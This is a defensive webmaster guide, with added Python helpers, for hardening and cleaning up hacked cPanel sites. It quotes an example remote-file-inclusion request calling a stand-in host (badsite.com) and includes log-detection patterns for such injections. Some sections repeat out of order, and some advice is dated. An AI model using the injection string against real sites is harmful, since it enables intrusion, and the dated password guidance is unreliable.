If you detect especially suspicious activity in your logs, you can block the IP addresses by using cPanel > Deny IP or with the appropriate code in your .htaccess file. Don’t be overzealous, though. It takes experience to learn what’s really suspicious and what’s just unfamiliar, and accidentally blocking legitimate visitors is bad public relations. Besides, if your site is otherwise secure, the probes to find security holes will fail, anyway.
6) Keep spyware off your computer. Prevent password interception.
* If you use a wireless network, make sure it is not open to eavesdroppers.
* Keep your computer free of spyware such as keyloggers.
* If you’re worried about your password being intercepted between you and your server, use encrypted https to log in to your server.
Preparations that will make hack diagnosis easier
1) Turn on log archiving in cPanel
Periodically delete the accumulated logs so they don’t consume all your hard drive space.
2) Get a complete list of your site files while they are known-good
This will be a baseline list of all the files that are supposed to be in your website. After a hack, it will help you decide whether a file you don’t recognize is related to the hack or is a required system file that you just never noticed before.
3) Explore your website and become familiar with what is there
Not just your pages, but the whole site, using FTP or File Manager. Get used to what is normal so things that aren’t will catch your attention.
How to know if you’ve been hacked
1) Whenever you log into cPanel,
Make sure “Last login from:” at the top of the screen shows your IP address from the last time you logged in.
2) Be alert for anything unusual when reviewing your
* Access logs,
* Usage reports in Webalizer, AWStats, Google Analytics, …
* Site data at Google Webmaster Central, (Google account and login required)
* Site data at Yahoo! Site Explorer. (Yahoo! account and login required)
Watch for occurrences of
* Unusual page names that you know you didn’t put on your site,
* Referrals or backlinks coming from weird sites or bad neighborhoods,
* Any indications that your site has pages it shouldn’t have, or connections to other sites that it shouldn’t have any connection with.
3) If your position in Google falls suddenly or if you drop out of the index,
one possible cause is that an exploit made modifications to your pages. Google sometimes notifies webmasters when they suspect a site has been hacked: http://www.mattcutts.com/blog/how-google-handles-hacked-sites/. They’ll try to contact you by any email address they can discover in their files or on your site. If Google discovers that your hacked site is now trying to distribute viruses or other badware, they sometimes also warn visitors about it when they try to go to your site from a search results page.
4) On search engine result pages (SERPs), make sure the text snippets for pages from your site consist of text you know is on those pages.
5) Use your browser’s View Source feature occasionally to look for invisible links in the HTML of your pages.
6) Check your site’s safety report and outlinks at http://www.siteadvisor.com/.
Have you ever thought about how you can prevent your website from getting hacked? There are many threats on the internet, and plenty of hackers are trying to take your site down, so here are some precautions that can help prevent your site from getting hacked. This guide can also be used after your site has been hacked. I suggest you build a safety shield before the war begins.
The server configuration discussed here is Linux/Apache with cPanel. The general steps will be the same on any server, but the specifics will differ.
There’s a good chance you came to this page because your website was hacked and you want to know how to clean it up.
Step-by-step repair after a website hack
This will probably take several days. Don’t think it’s going to be easy.
1) Log into cPanel
If the line at the top that says, “Last login from: IP address” is not your IP address from the last time you logged in, write it down. It is probably the hacker.
2) Change passwords for cPanel and for publishing
Use strong passwords. A password MUST NOT BE a single word that is in any human language dictionary, and it SHOULD NOT CONTAIN any real word. It should be random characters.
a) If you publish with FrontPage, change your FrontPage password first:
1. Open your local copy of your site in FrontPage
2. Click the Remote Web Site tab and log in
3. Click Open your Remote Web site in FrontPage (this will open a new copy of FrontPage with your remote site in it)
4. Click Tools > Server > Change Password. Whenever you get a password prompt during this procedure, it wants the old one. It doesn’t want the new one until it asks for it.
After changing the FrontPage password…
b) Log in to your webhosting account and change the password there
Some webhosts might use cPanel for this. Others might have a separate login for password changes. Consider changing the passwords for your email accounts, too.
3) If it is a dire emergency, take your website offline
If the hacker inserted extremely offensive pages or installed a virus, protect your visitors and your reputation by taking your site offline.
While it’s closed, you likely won’t be able to access your site through FrontPage. That’s why you changed your FrontPage password before taking the site offline.
4) Enable log archiving in cPanel
1. Go to cPanel > Raw Log Manager.
2. Check the “Archive Logs…” box.
3. Uncheck the “Remove the previous month’s archived logs…” box.
4. Click Save
If log archiving was off at the time of the hack, it may be too late to see the original hack. However, if the hackers come back, their activity might now be logged, allowing you to identify their IP address.
5) Find and remove all files installed by the hack
This describes an ideal cleanup operation. Will you be able to fully complete every step? Probably not.
If your site isn’t huge, you might save a lot of trouble by deleting everything inside your public_html folder and republishing your entire site from a backup copy. You’ll still need to inspect your root directory (above public_html) and its other subdirectories for damage.
5a) Get a complete list of all the files in your website
There are three methods (Sections 5a, 5b, 5c). For most purposes, this first cron job method will be easier to review in detail than the other two methods.
You probably don’t have direct access to Linux on your server to create a directory listing, but you can create a cron job that will do it. It is the equivalent of the DOS command dir /s.
1. Go to cPanel > Cron jobs > Standard.
2. Enter the email address where you want the output sent,
3. Enter the command line to run. The switches are case-sensitive, so use exactly this capitalization:
ls -1aFlqR
Here it is in upper case to make the letters distinct, but this command is NOT the same as the one above. Don’t use it: LS -1AFLQR.
The switches for the ls command are described at http://www.ss64.com/bash/ls.html and http://en.wikipedia.org/wiki/Ls.
4. Make selections in all the other fields to specify a time several minutes in the future.
5. Click “Save Crontab”.
6. After it runs, go back to Cron Jobs > Standard and delete this job.
The email will contain a listing with lines that look like the following examples for one directory and one file:
drwxr-x--- 33 user user 4096 Feb 5 20:51 public_html/
-rw-r--r-- 1 user user 16669 Feb 5 20:51 index.htm
A brief explanation:
d indicates a directory
The 3 groups of 3 (rwxrwxrwx) are permissions for User, Group, World.
r, w, x stand for Read, Write, Execute a program or Enter a directory.
Walkthrough of the above:
public_html above is a directory.
The User (owner, me) can read, write, or Enter that folder.
The Group (that I am member of) cannot Write to that folder (thus the “-” where the w would be)
The World (everyone else) has no permissions here (“---”). (I know that seems odd for public_html, but the reasons why are not useful here.)
index.htm, the home page:
User can Read or Write.
To everyone else (Group and World), the file is Read-only.
The user fields should show only your hosting account userID or some other ones that are obvious system names.
The numbers are file sizes.
The timestamps are timestamps.
There is further explanation in this post at Lunarforums.
How to use the listing:
7. If you have a file list like this that you made before the hack, compare the two lists to identify files in the new listing that don’t belong.
8. If you don’t have a prior list to compare against, review the new list for files that seem out of place. See What To Look For, below.
5b) Examine your site’s files in cPanel > File Manager
If you can’t use the cron job method, this is an alternative, but navigating up and down the directory tree will get very tedious very fast.
In File Manager, file and folder permissions are shown numerically. R=4, W=2, X=1. The permission level for a user is the sum, so the maximum a user can have is 7. If, for example, the User has RW, but Group and World only have R, then the permissions will be: 644.
5c) Examine your site’s files using FTP
With an FTP view of your website, the folders and files look like what you are used to in Windows Explorer. FTP view is available using Internet Explorer 6 or 7 and Windows Explorer. FTP view is easy to navigate, but it doesn’t show file and folder permissions.
a) FTP by IE6
In the IE6 address bar, type the FTP address for your site. It is probably something like: ftp://yourdomain.com/ or ftp://ftp.yourdomain.com/ If you don’t get a login prompt, click File > Login As…
b) FTP by IE7
Help for this is available in IE7 Help (F1) > Contents > FTP.
1. Open Tools >
Internet Options > Advanced
2. Make sure “Enable FTP folder view (outside IE)” is checked.
3. Click OK.
4. In the IE7 address bar, type the FTP address for your site.
5. Ignore the error page.
6. Click Page > Open FTP site in Windows Explorer…
7. At the FTP Folder Error dialog box, click OK.
8. Click File > Login As… to obtain the login prompt.
c) FTP by Windows Explorer
1. Enable the address bar (View > Toolbars > Address bar). You may need to unlock the toolbars, relocate, and resize it.
2. In the address bar, type the FTP address for your site.
3. At the FTP Folder Error dialog box, click OK.
4. Click File > Login As… to obtain the login prompt.
5d) What to look for
Regardless of the method you used to get your file list, look for and repair the following. If hacked pages contain clues such as URLs that will help identify the hacker, copy and save the useful text somewhere before you repair the page:
* Files you know don’t belong there. Some hacks install files with ridiculously obvious names like hacked.html or vulnerable.php, etc. Other files might have nonsensical names or names consisting of random character strings. Some files might be in locations that make them suspicious, like a .php file in your /images folder.
Be watchful for any files you don’t recognize, but be careful because some of them are probably required for your site to function properly and you just never noticed them before. You cannot just delete all the files you didn’t put on the site. Determine whether each one is malicious or not. When in doubt, try a web search on the filename or post a question in a forum where other people can tell you if that file is normal.
* Check your root directory (“/”) and its subdirectories for malicious or altered files. Inspect everything carefully. Even if you delete the contents of your public_html and republish the site from scratch, this doesn’t overwrite your folders above public_html, so you must check those manually.
* Find and remove malicious scripts. Look especially for PHP and CGI scripts that you didn’t create. Inspect existing PHP and other plain text scripts for signs of tampering. Backdoor scripts left in place can allow the hackers back in even after you’ve changed your password.
When in doubt, it is safest to stop using scripts you suspect might have been weak, especially ones you wrote yourself, until you can examine them and determine that they’re safe. Rename or delete them so the hacker can’t continue to access them by their previous names.
* Pages with modified dates more recent than you last saved the page yourself. Inspect the text and replace the file with a backup copy, if necessary.
* If you publish with FrontPage HTTP, it appears that whenever you publish any files, the timestamp of every .htm file on the site is set to the time of the publish. So in this case your timestamps may all be identical, except for hacked pages.
6) Check all file and folder permissions
Using the complete file list you made, or File Manager, make sure all file and folder permissions are what they should be. When in doubt, you can compare the permissions of similar or neighboring files and folders. A hacker is unlikely to bother with changing all permissions. Review the brief “RWX” explanation above and apply common sense. Your site visitors are “World”, so World needs Read access to files they are supposed to see. World should almost never have Write access to anything. Although different hosts might have different rules, common permissions for world-accessible folders are 755, and common permissions for world-accessible files are 644. It is left to you to figure out why. If you start running across what look like permissions hacks, you will need to do some studying and some detailed investigation of each file and folder.
A hacker can modify file or folder permissions to allow them to get back in even after you clean up everything else in your site. If they can get Write permission to one folder, they can upload exploit scripts to it and run them.
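To put steps 5a and 6 together in code: the following added example (not from the article or from cPanel) parses the emailed `ls -1aFlqR` listing, diffs it against the baseline list you made while the site was known-good, converts rwx letters to the numeric form File Manager shows, and flags World-writable items, owners that are not yours, and scripts sitting in an images folder. The two listings, the `user` account name, and every file name, size and date in them are constructed for the example.

```python
import re
from collections import namedtuple

Entry = namedtuple("Entry", "perms owner group size mtime is_dir")
# One line of `ls -1aFlqR` output: type, nine permission letters, link count, owner,
# group, size, "Mon dd hh:mm" (or "Mon dd yyyy"), then the name with its -F suffix.
ENTRY_RE = re.compile(
    r"^(?P<type>[-dl])(?P<perms>[rwxsStT-]{9})[.+@]?\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+(?P<size>\d+)\s+(?P<mtime>[A-Za-z]{3}\s+\d{1,2}\s+(?:\d{2}:\d{2}|\d{4}))\s+(?P<name>.+)$"
)

# Constructed listings in the cron email's layout: one made while the site was
# known-good, one made after the hack. Names, sizes and dates are invented.
BASELINE = """\
public_html:
drwxr-x---  3 user user  4096 Feb  5 20:51 ./
drwx--x--x 33 user user  4096 Feb  5 20:51 ../
-rw-r--r--  1 user user   812 Feb  5 20:51 contact.php
drwxr-xr-x  2 user user  4096 Feb  5 20:51 images/
-rw-r--r--  1 user user 16669 Feb  5 20:51 index.htm

public_html/images:
drwxr-xr-x  2 user user  4096 Feb  5 20:51 ./
-rw-r--r--  1 user user  2048 Feb  5 20:51 logo.gif
"""
AFTER_HACK = """\
public_html:
drwxr-x---  4 user user  4096 Feb  9 03:12 ./
drwx--x--x 33 user user  4096 Feb  5 20:51 ../
-rw-rw-rw-  1 user user   812 Feb  5 20:51 contact.php
drwxr-xr-x  2 user user  4096 Feb  9 03:12 images/
-rw-r--r--  1 user user 17420 Feb  9 03:12 index.htm
drwxrwxrwx  2 user user  4096 Feb  9 03:12 tmp/

public_html/images:
drwxr-xr-x  2 user user  4096 Feb  9 03:12 ./
-rw-r--r--  1 user user  2048 Feb  5 20:51 logo.gif
-rw-r--r--  1 user user  3310 Feb  9 03:12 x7f3k.php

public_html/tmp:
drwxrwxrwx  2 user user  4096 Feb  9 03:12 ./
"""

def perm_to_octal(perms):
    """'rwxr-x---' -> '750' with the R=4, W=2, X=1 scheme that File Manager displays."""
    digits = ""
    for i in range(0, 9, 3):
        r, w, x = perms[i:i + 3]
        # setuid/setgid/sticky letters (s, t) also mean the execute bit is set
        digits += str((4 if r == "r" else 0) + (2 if w == "w" else 0) + (1 if x in "xst" else 0))
    return digits

def parse_listing(text):
    """Turn the emailed listing into {path: Entry}, skipping '.', '..' and 'total' lines."""
    entries, cur_dir = {}, ""
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            name = m["name"]
            if name[-1] in "/*@=|>":                 # indicator characters added by -F
                name = name[:-1]
            if name in (".", ".."):
                continue
            path = f"{cur_dir}/{name}" if cur_dir else name
            entries[path] = Entry(m["perms"], m["owner"], m["group"],
                                  int(m["size"]), m["mtime"], m["type"] == "d")
        elif line.endswith(":"):                     # "dirname:" header printed by -R
            d = line[:-1]
            cur_dir = "" if d == "." else d[2:] if d.startswith("./") else d
    return entries

def compare(baseline, current):
    """Files that appeared, vanished, or changed between the known-good list and today's."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = {}
    for path in set(baseline) & set(current):
        old, new = baseline[path], current[path]
        reasons = [f"{f}: {getattr(old, f)} -> {getattr(new, f)}"
                   for f in ("perms", "owner", "size", "mtime") if getattr(old, f) != getattr(new, f)]
        if reasons:
            changed[path] = reasons
    return {"added": added, "removed": removed, "changed": changed}

def audit_permissions(entries, expected_owners):
    """Flag World-writable items, owners that are not yours, scripts in image folders,
    and anything not at the common 755 (folder) / 644 (file) so you can compare neighbours."""
    findings = []
    for path, e in sorted(entries.items()):
        octal = perm_to_octal(e.perms)
        if e.perms[7] == "w":                        # the World 'w' bit
            findings.append((path, f"world-writable ({octal})"))
        elif octal != ("755" if e.is_dir else "644"):
            findings.append((path, f"unusual permissions ({octal})"))
        if e.owner not in expected_owners:
            findings.append((path, f"unexpected owner {e.owner}"))
        if not e.is_dir and re.search(r"\.(php|cgi|pl)$", path, re.I) and "/images/" in f"/{path}/":
            findings.append((path, "script in an images folder"))
    return findings
```

Run `compare(parse_listing(BASELINE), parse_listing(AFTER_HACK))` and `audit_permissions(parse_listing(AFTER_HACK), {"user"})` on your own two listings; anything under "added" or "world-writable" is the first thing to inspect.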
7) Change your passwords again
In case someone was “watching” inside your site while you did it the first time, do it again now that you know the site is clean.
8) Try to identify the hacker’s IP address
Stats programs like Analog, Webalizer, or AWStats are not going to be helpful here because they generate aggregated statistics. You need detail.
cPanel > Web/FTP Stats > Latest Visitors is useful and easy. It is a good place to go when you first notice the hack, but it is only a start. You really need the full raw logs.
a) If you have never used your site’s raw access logs before:
Your website’s raw access logs are stored and sent to you as gzipped files. If you don’t have a program that will extract *.gz files, get the 7-Zip program from http://www.7-zip.org/. It is a command line utility that you run from a “DOS box” (aka “Command Prompt”).
b) Get your logs from cPanel > Raw Log Manager
1. Go to cPanel > Raw Log Manager
2. Click the name of the file you want to download.
3. At the Open or Save prompt, click Save. Use a descriptive filename. Save the file to a folder that will be easy to navigate to in a Command Prompt. C:\TEMP works well.
4. Open a Command Prompt:
Start > All Programs > Accessories > Command Prompt, or
Start > Run > cmd.exe
5. Go to the folder where you saved the .gz file: cd temp
6. Type the command line to extract the .gz file:
7za.exe x filename.gz
7. You should get a report that says “Everything is Ok”.
8. I usually delete the .gz file and rename the output file to .log.
9. WordPad is best for viewing these log files as text. Set the font to a monospaced font, with word wrap Off.
10. You can import your HTTP (regular) log file into the Webstats.mdb Access database. It won’t import your FTP log.
11. The HTTP log will also import into Excel, but you will need to tweak the text import wizard settings to get the fields into their columns properly.
12. The FTP log is probably best viewed as text.
Go through the logs carefully. If log archiving was on at the time of the hack, look for suspicious activity in the days prior to the hack. Keep watching the logs in case the hackers come back.
Your regular log will show HTTP accesses, your normal site visitors. Mixed in with all the visitors and legitimate robots, you could find a person or robot GETting pages in an abnormal browse sequence (not following links on your site) or trying to GET pages that don’t exist on your site. They might be seeing if your site has particular pages that are part of widely used scripts that are known to have vulnerabilities. Look for HTTP POST activity. Not all POSTs are suspicious, though. If you use PHP, look for requests that attempt to inject code or variables into the page:
GET /index.php?inc=http://badsite.com/hackscript.txt.
Your FTP log will show FTP accesses, one way that hackers can download your pages, modify them, and upload them back to your website. The only IP addresses in the FTP log should be yours and other authorized FTP users.
In both logs, check the field called REMOTE_USER, User, or UserID. In the HTTP log, this field is blank (“-”) most of the time. Where it does have a value, make sure it’s your UserID and that the IP address is yours. Make sure the timestamps on the accesses match the times you were logged in.
c) Use .htaccess or cPanel > Deny IP to block the hacker’s HTTP access to your site
If you identified the hacker’s IP address, one site where you can look it up to get more information about it is http://whois.domaintools.com/.
You can ban the hacker’s IP address from your site using your public_html/.htaccess file. Apache documentation for this is at: http://httpd.apache.org/docs/1.3/mod/mod_access.html.
Review the instructions in a prior article for how to open .htaccess for editing. As described there, insert the following line in a part of the file that is not enclosed in HTML-like tags.
deny from nnn.nnn.nnn.nnn
The nnn’s are the IP address to block.
If the hacker returns with a different IP that is in the same IP range (i.e. using the same ISP), you can block the whole range for a while, although that carries the risk of banning legitimate visitors, too.
The Apache documentation has instructions for banning a range. Some IP ranges are easily specified using a simple wildcard notation. Others ranges can only be successfully defined using “CIDR/netmask” notation. Although it looks intimidating, it’s easy after the first time you do it. I have a separate article describing how to calculate and use the CIDR/netmask.
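As an added example (not from the article or from Apache), here is a small Python helper that turns the addresses and ranges you flagged into `deny from` lines in either CIDR or netmask form, merging overlapping ranges, and lets you check a visitor's address against the result before you save .htaccess, so a range does not swallow legitimate visitors. The addresses in FLAGGED are made-up documentation addresses, not real offenders.

```python
import ipaddress

# Hypothetical addresses flagged while reading the logs: a single IP, a "first-last"
# range, and a CIDR block that overlaps the range. All are documentation addresses.
FLAGGED = ["203.0.113.77", "198.51.100.0-198.51.100.255", "198.51.100.200/29"]


def to_networks(items):
    """Parse each item into one or more networks, then merge overlaps and neighbours
    into the fewest CIDR blocks that cover exactly the same addresses."""
    nets = []
    for item in items:
        if "-" in item:                      # "first-last" range
            first, last = (ipaddress.ip_address(s.strip()) for s in item.split("-", 1))
            nets.extend(ipaddress.summarize_address_range(first, last))
        else:                                # single address or CIDR block
            nets.append(ipaddress.ip_network(item, strict=False))
    return list(ipaddress.collapse_addresses(nets))


def deny_lines(items, style="cidr"):
    """Render mod_access (Apache 1.3/2.2) 'deny from' lines. style='netmask' writes
    a.b.c.d/m.m.m.m instead of a.b.c.d/prefix; mod_access accepts both forms.
    (Apache 2.4 replaced mod_access with mod_authz_core's 'Require not ip'.)"""
    lines = []
    for net in to_networks(items):
        if net.num_addresses == 1:
            lines.append(f"deny from {net.network_address}")
        elif style == "netmask":
            lines.append(f"deny from {net.with_netmask}")
        else:
            lines.append(f"deny from {net.with_prefixlen}")
    return lines


def is_blocked(ip, lines):
    """Check one visitor address against the generated rules before saving them,
    so you can see whether a range also catches someone who should get through."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(line.split()[2], strict=False)
               for line in lines if line.startswith("deny from "))


if __name__ == "__main__":
    rules = deny_lines(FLAGGED)
    print("\n".join(rules))
    for visitor in ("198.51.100.42", "198.51.101.1", "203.0.113.77"):
        print(visitor, "blocked" if is_blocked(visitor, rules) else "allowed")
```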
d) If the hacker has obtained access to your cPanel or FTP, banning their IP address in .htaccess will NOT keep them out of cPanel and FTP.
If they have scripts that they call by HTTP, it will prevent them from doing that, but only until they log into cPanel and un-ban themselves in .htaccess.
9) Investigate what made the hack possible
It might be obvious or it might require detective work. The section below on hack prevention describes some common avenues of attack. It is important to identify how they got in so you can prevent the next attack. For example, if they got in through a vulnerable script, and you don’t rewrite or update the script, all the work you’ve done to this point is useless because they can come right back and wreck your site again.
Three common avenues:
1. Old versions of third party scripts with known vulnerabilities. Make sure you are using the latest versions of software for forums, image galleries, blogs, and everything else.
If you do all your installations through Fantastico, you can check your versions at cPanel > Fantastico > Installations overview.
Otherwise, the version is usually shown on the pages generated by the script, so go to your gallery, blog, or forum, and look around. Then compare the version to the latest one being distributed at the website for that software.
2. The site password was easy to crack.
3. Homebrew PHP or CGI scripts were flawed and had security holes. Make sure the settings in your php.ini file are as secure as possible.
10) Report or go after the hacker legally?
You can try, but your chances of getting anywhere with it might not be great.
Hacking is a violation of the terms of service for any legitimate web host or ISP. If you can prove that someone is using a particular IP address for hacking, you could report the incident to the web host or ISP in hopes that they might shut the perpetrator down. The contact email is often abuse@ the company.
What to do BEFORE your website is hacked, so it doesn’t get hacked
What is a hack?
A hack occurs when someone gets write access to your server so they are able to modify, add, or delete pages.
Many people ask, “How could my site have been hacked? The hacked page was 100% pure HTML.”
The answer is that the modification of the page wasn’t the hack. The hack was when they got write access to the server. Modifying the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING with your site that you can do, including alter static pages.
Why do they do it?
Business/money
The goal of most site hacks is to use vulnerable sites to make money. It is a business enterprise. They can:
* Use your site’s mail server to send spam.
* Insert links to their own sites, visible or invisible. The links from your site to theirs bring traffic and also boost their site’s rankings in search engines.
* Insert their AdSense code onto your site’s pages so clicks are credited to them.
* Put phishing pages on your site to try to obtain confidential information from your visitors.
* Use your server to host illegal content.
* Add viruses, adware, or spyware to your site so it’s downloaded onto your visitors’ computers to try to obtain their confidential information.
Fun, challenge, prestige, or malice
There are hackers who deface sites individually, but it’s time-intensive to hack sites one by one. Occasionally a site is hacked by someone who dislikes the site or its owner. These are not the major threats.
How do they do it?
Some examples:
* Automated web crawlers cast a wide net, identifying websites with a specific security weakness. For example, if a popular script is found to have a vulnerable page called forminfo.php, the crawler will visit every website it knows about, issuing a request to GET forminfo.php. If the request returns a code 404 (Page Not Found), then it moves on. If the page returns a code 200 (Success), the website becomes a target, either by a human hacker or by a computer program that executes the steps to exploit the weakness and install the hacker’s files onto the site.
* Crawl the web searching the source code of web pages for PHP or CGI scripts with names commonly used by email forms handlers. When one is found, an automated procedure starts sending it input to test whether the script can be tricked into sending spam to third parties.
* Automated password cracking programs hammer at cPanel logins until the correct user ID and password combinations are found. People who create their own passwords are remarkably predictable, and the algorithms used for password cracking are remarkably sophisticated.
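These probes leave traces in the raw access logs described under “Try to identify the hacker’s IP address” in the repair section. As an added example (not from the article), the following Python script reads combined-format log lines and pulls out the things that section says to look for: a URL passed as a script parameter, one address asking for several script pages that do not exist, POST requests, and a REMOTE_USER value that is not your account or not from your address. The log lines, the `owner` account and its address in KNOWN_USERS are constructed for the example.

```python
import re
from collections import defaultdict

# Apache "combined" access log line, the format cPanel's Raw Log Manager hands you.
# Referrer and user-agent at the end of the line are ignored here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# Paths that belong to scripts: a burst of 404s on these from one address is a crawler
# checking whether your site runs a package with a known weak page.
SCRIPT_EXT = re.compile(r'\.(php|cgi|pl)$', re.IGNORECASE)
# A query-string value that is itself a URL: the remote-include pattern from the article.
URL_IN_QUERY = re.compile(r'[?&][^=&]+=(https?|ftp)://', re.IGNORECASE)

# Constructed sample log lines (not from a real server); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Feb/2011:20:51:03 +0000] "GET /index.htm HTTP/1.1" 200 16669 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Feb/2011:20:52:10 +0000] "GET /forminfo.php HTTP/1.1" 404 215 "-" "-"
198.51.100.7 - - [05/Feb/2011:20:52:11 +0000] "GET /admin/forminfo.php HTTP/1.1" 404 215 "-" "-"
198.51.100.7 - - [05/Feb/2011:20:52:12 +0000] "GET /forum/forminfo.php HTTP/1.1" 404 215 "-" "-"
198.51.100.7 - - [05/Feb/2011:20:52:13 +0000] "GET /blog/forminfo.php HTTP/1.1" 404 215 "-" "-"
198.51.100.7 - - [05/Feb/2011:20:52:15 +0000] "GET /index.php?inc=http://badsite.com/hackscript.txt HTTP/1.1" 200 812 "-" "-"
192.0.2.9 - owner [05/Feb/2011:21:00:00 +0000] "GET /cgi-bin/stats.pl HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
198.51.100.7 - owner [05/Feb/2011:21:02:00 +0000] "GET /cgi-bin/stats.pl HTTP/1.1" 200 3001 "-" "-"
203.0.113.5 - - [05/Feb/2011:21:05:00 +0000] "POST /contact.php HTTP/1.1" 200 410 "http://example.com/contact.htm" "Mozilla/5.0"
"""

# Hypothetical: the hosting account's UserID and the address(es) its owner logs in from.
KNOWN_USERS = {"owner": {"192.0.2.9"}}


def parse_line(line):
    """Split one combined-format line into its fields, or return None for junk."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyze(log_text, known_users, probe_threshold=3):
    """Pull out the things the article says to look for when reading raw logs."""
    remote_includes = []                    # URL passed as a script parameter
    not_found_scripts = defaultdict(list)   # ip -> script paths that returned 404
    posts = []                              # every POST; not all are bad, but review them
    odd_logins = []                         # REMOTE_USER set, but not you or not your address
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if URL_IN_QUERY.search(path):
            remote_includes.append((ip, path))
        bare = path.split("?", 1)[0]
        if rec["status"] == 404 and SCRIPT_EXT.search(bare):
            not_found_scripts[ip].append(bare)
        if rec["method"] == "POST":
            posts.append((ip, path))
        user = rec["user"]
        if user != "-" and ip not in known_users.get(user, set()):
            odd_logins.append((ip, user))
    # One address asking for several script pages that do not exist is the
    # "does this site have forminfo.php?" crawler described in the article.
    probing_ips = {ip: paths for ip, paths in not_found_scripts.items()
                   if len(paths) >= probe_threshold}
    return {"remote_includes": remote_includes, "probing_ips": probing_ips,
            "posts": posts, "odd_logins": odd_logins}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG, KNOWN_USERS).items():
        print(key, value)
```

Feed it the extracted .log file instead of SAMPLE_LOG, and raise probe_threshold if your site legitimately produces many 404s on script paths.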
Steps to prevent hacking
1) Always use strong passwords
If you don’t know what a strong password looks like, go to https://www.grc.com/passwords.htm. The third row on that page (“63 random alpha-numeric characters”) contains the types of characters to use for cPanel passwords. Pick the first, or any, 8 chars from that row. Any password that does not look like the ones you see on that page is bad.
* In cPanel, only 8 characters are significant, so use all 8. Use a mixture of upper and lower case letters and digits. Special characters (punctuation, etc.) do not seem to be allowed by cPanel.
The #1 threat to your website is internet attackers. There are thousands of them, and they will definitely try to damage your website if they get in. That is why you MUST use strong passwords that are difficult to crack. This must be the FIRST consideration.
Write down your strong password so you don’t forget it. People sometimes avoid strong passwords because they’ve heard passwords should never be written down. That rule was for Defense Department workers who had to worry about Soviet spies. You don’t. You have to worry about internet hackers. Writing down your strong password is only a trivial security risk. Using a weak password because that’s the only kind you can remember is a huge security risk.
Keep your written passwords appropriately safe for your situation. Do you have mischievous children? Don’t leave passwords lying around where they can find them. Malevolent coworkers? Don’t leave passwords in your desk drawers. Do you habitually lose your wallet or purse? Well then, don’t keep them there, either. Take whatever precautions are necessary for YOUR situation.
If you have a userID associated with your hosting account, keep that as secret as possible, too, because a hacker needs it to log in as you. Don’t post it in forum messages.
About strong passwords: http://en.wikipedia.org/wiki/Strong_password#strong_passwords
2) Don’t weaken your server’s file and folder permissions
* Do not modify the file and folder permissions on your server until you know what you’re doing. Study the permission settings carefully. Don’t guess.
Each folder and file on your Linux server has a set of permissions that determine who can read or write that file, execute that program, or enter that folder.
One mistake in a file or folder permission can allow a hacker to get into your site, and they won’t even need your password to do it.
3) Keep third party scripts up to date
If you use popular third party scripts like Coppermine, WordPress, SMF, vBulletin, phpBB, or any others, get on a mailing list or visit forums where updates are announced. When a security update is released, install it without delay.
When a vulnerability is found in a commonly used script, it is likely to be exploited soon by a lot of hackers because it gives them access to a large number of sites.
4) Write your own scripts securely
* Be aware of the potential security risks of each language you use.
* For PHP, use a php.ini file to block some common avenues of attack.
* Don’t use potentially insecure features of any language until you’ve studied and understand them. There are lots of online resources for learning how to code securely.
A vulnerable script can give hackers access to your user database and financial or other confidential data.
* All data that comes into your script from the outside world poses a potential security risk. If your script takes input from a user or from passed parameters in a URL string or from a cookie, the input needs to be checked for validity, tested to determine if it contains injection exploit code, and cleaned (“escaped”) before you use it to include a file or access a database.
5) Block suspicious accesses with .htaccess
If you detect especially suspicious activity in your logs, you can block the IP addresses by using cPanel > Deny IP or with the appropriate code in your .htaccess file. Don’t be overzealous, though. It takes experience to learn what’s really suspicious and what’s just unfamiliar, and accidentally blocking legitimate visitors is bad public relations. Besides, if your site is otherwise secure, the probes to find security holes will fail, anyway.
6) Keep spyware off your computer. Prevent password interception.
* If you use a wireless network, make sure it is not open to eavesdroppers.
* Keep your computer free of spyware such as keyloggers.
* If you’re worried about your password being intercepted between you and your server, use encrypted https to log in to your server.
Preparations that will make hack diagnosis easier
1) Turn on log archiving in cPanel
Periodically delete the accumulated logs so they don’t consume all your hard drive space.
2) Get a complete list of your site files while they are known-good
This will be a baseline list of all the files that are supposed to be in your website. After a hack, it will help you decide whether a file you don’t recognize is related to the hack or is a required system file that you just never noticed before.
3) Explore your website and become familiar with what is there
Not just your pages, but the whole site, using FTP or File Manager. Get used to what is normal so things that aren’t will catch your attention.
How to know if you’ve been hacked
1) Whenever you log into cPanel,
Make sure “Last login from:” at the top of the screen shows your IP address from the last time you logged in.
2) Be alert for anything unusual when reviewing your
* Access logs,
* Usage reports in Webalizer, AWStats, Google Analytics, …
* Site data at Google Webmaster Central, (Google account and login required)
* Site data at Yahoo! Site Explorer. (Yahoo! account and login required)
Watch for occurrences of
* Unusual page names that you know you didn’t put on your site,
* Referrals or backlinks coming from weird sites or bad neighborhoods,
* Any indications that your site has pages it shouldn’t have, or connections to other sites that it shouldn’t have any connection with.
3) If your position in Google falls suddenly or if you drop out of the index,
one possible cause is that an exploit made modifications to your pages. Google sometimes notifies webmasters when they suspect a site has been hacked: http://www.mattcutts.com/blog/how-google-handles-hacked-sites/. They’ll try to contact you by any email address they can discover in their files or on your site. If Google discovers that your hacked site is now trying to distribute viruses or other badware, they sometimes also warn visitors about it when they try to go to your site from a search results page.
4) On search engine result pages (SERPs), make sure the text snippets for pages from your site consist of text you know is on those pages.
5) Use your browser’s View Source feature occasionally to look for invisible links in the HTML of your pages.
6) Check your site’s safety report and outlinks at http://www.siteadvisor.com/.
